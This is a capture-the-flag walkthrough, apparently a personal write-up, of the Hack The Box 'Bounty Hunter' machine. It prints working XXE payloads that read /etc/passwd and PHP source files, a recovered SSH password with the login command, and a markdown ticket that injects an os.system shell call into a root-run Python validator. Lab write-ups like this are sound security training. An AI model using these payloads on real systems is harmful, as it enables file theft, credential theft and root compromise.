Hack The Box — Bounty Hunter
This machine is a beginner friendly machine. The root flag especially tests your mindset of privilege escalation.
I opened the website and started looking for hints, usually there are hints either on the webpage or in source code.
From here I thought the hack might have something to do with Burp or Buffer overflow.
I submitted the Contact form but no POST request was submitted so I ignored it.
I checked the source code but couldn’t find anything.
Then went to Portal webpage, and immediately saw that the website is in PHP.
Afterwards, I checked log_submit.php submitted details and I could see that a Post request is happening. I thought that checking this request in Burp can be worthwhile.
Simultaneously I did the Port Scan using NMAP and MASSCAN, Directory Enumeration using FFUF. Only 22 and 80 ports were open and nothing interesting was there. For directory enumeration I found three pages:
portal.php
log_submit.php
db.php [Status: 200, Size: 0, Words: 1, Lines: 1]
I checked db.php in browser and it’s source code, but couldn’t find anything.
Back to the Burp suite. I checked the POST request
First thing I noticed was that data was going in base64, second that it was decoded from XML.
I did try to brute force by trying out encoding sleep 5 in base64 and sending it, but then I realized I need to manipulate XML.
The first place mind goes to when I think about XML is XXE(XML External Entity) attack.
First I checked if basic new entity is working.
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe “3”>]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>
Encode in Base 64 and then URL encoding.
We can see that it’s working.
Now was the deciding moment of this box. If SYSTEM “file:///etc/passwd” worked then we have found out the vulnerability.
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>
Encode in Base 64 and then URL encoding.
Here we go. We have found the vulnerability. We have list of users of the server.
Vulnerability to SHELL
Gaining access to shell was easy, but I wasted my time on the wrong things.
First, I tried expect://id which didn’t work.
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “expect://id”>]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>
Then I tried to convert it to a SSRF attack, which also failed.
Finally, I started reading the php files that I found using FFUF. Couldn’t find anything in portal.php and log_submit.php. I got especially curious about db.php firstly because of it’s name and second that it’s size was 0 in browser.
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “php://filter/convert.base64-encode/resource=db.php” >]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>
Using this payload I got a Base64 string in response. I decoded the string and got an almost ideal response.
I have a password. I knew I have to do SSH now. The question was for which user? I got confused between admin, test and even thought bounty can be the username. I wasted some time on this then I thought that I have a list of users that I found on etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
From here I chose the most unusual however the type of username which kind of makes sense to keep i.e. development.
ssh development@10.10.11.100 with password as m19RoAU0hP41A1sTsq6K and voila we get the shell.
Life is good :). I got the user flag and submitted. I took a break for some time after this.
Privilege Escalation
I just kept the basic idea I had in mind to run something from development which had privileges of root.
The first thing I did was sudo -l:
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
So, we can run ticketValidator.py as development user. On checking it, I saw that it runs markdown files(md).
Following the rules of ticketValidator create the md file.
# Skytrain Inc
## Ticket to
__Ticket Code:__
**200+ 24 == 224 and __import__(‘os’).system(‘sh’) == False
And we are in. We have successfully rooted Bounty Hunter.
